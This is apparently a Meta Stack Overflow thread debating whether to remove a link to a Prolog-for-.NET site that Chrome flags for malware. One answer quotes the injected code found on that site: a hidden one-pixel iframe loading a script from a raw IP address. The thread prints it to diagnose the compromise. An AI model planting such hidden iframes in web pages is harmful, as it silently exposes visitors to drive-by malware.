# Should this answer be deleted due to linking to (potentially) malicious content

Tags: discussion, specific-answer, malicious-links

The accepted answer to [Integrating Prolog with C#](https://stackoverflow.com/questions/181855/integrating-prolog-with-c) has a link when clicking that link. Chrome reports the server to be known for malware. Is that reason to delete the answer/link. I believe the project linked to can be found at prolog.codeplex.com but I'm not certain they are actually the same port of Prolog.

Answer (score 11, accepted):

It looks like the site has been vandalized with some rogue code inserted:

```
<body><iframe src='http://81.95.149.235/cgi-bin/nsp.cgi?p=alex' width='1' height='1'style='visibility: hidden;'></iframe>echo "";
```

This will probably be discovered quickly and taken care of, I don't see any reason to remove the link. I've left a comment under the answer to let people know. It also appears that the IP in question has subsequently been null routed.

I'd also appreciate a ping (in comments) when the site has been fixed, so that I can remove my comment on the answer (just in case I forget to check on it tomorrow).

#### Update

@Will removed the link on the basis that people probably should not be downloading things from sites that were obviously compromised, I didn't realize that the only way to get Prolog.net was *from that site*. Still, a ping or a flag is appreciated so that we can put things back to the way they were once the site is fixed.

Answer (score 3):

Sadly some websites incorrectly get flagged for malware, through dodgey adverts and comments, not sure if that is the case with this though.

But as it is the accepted answer it must have helped the OP in some way. I think the most constructive thing would be to leave comment stating that link flags a malware alert in Chrome, and hopefully the answerer/a moderator will provide an alternative link or copy the relevant code from the linked website and remove the link itself.

Comment: Right; don't delete the answer completely. You could consider either de-hyperlinking the link and adding a warning, or simply alerting the person who posted it in a comment (as suggested here).

Answer (score 2):

Here's the message from Chrome (you should have reproduced it in your question here):

> **Warning: Visiting this site may harm your computer!**
>   The website at prolog.hodroj.net contains elements from the site 81.95.149.235, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
>   For detailed information about the problems with these elements, visit the Google [Safe Browsing diagnostic page](http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://81.95.149.235/cgi-bin/nsp.cgi%3Fp%3Dalex&client=googlechrome&hl=en-GB) for 81.95.149.235.

Chrome is flagging the IP address; this address of a hosting provider. It's likely that this provider has hosted malware at some point (because one of its client was malicious or broken into). There is no particular indication that the `prolog.hodroj.net` site itself hosts malware. This is most likely an over-eager malware warning.

In general, if you see an answer that links to malware, **flag** it, and a moderator will delete it if he agrees, and take appropriate measures if it looks like the poster deliberately linked to malware. However, here, there is no indication that the answer does link to malware.

Comment: I thought about posting the message but then I thought well not that many people understand Danish so would be very helpful :) but thanks for posting a version that most if not all on this site actually will be able to understand I also flagged the question for mod attention. The moderator was the person suggestion to post this exact question :). Oh And I never claimed that there was any malware hosted on prolog.hodroj.net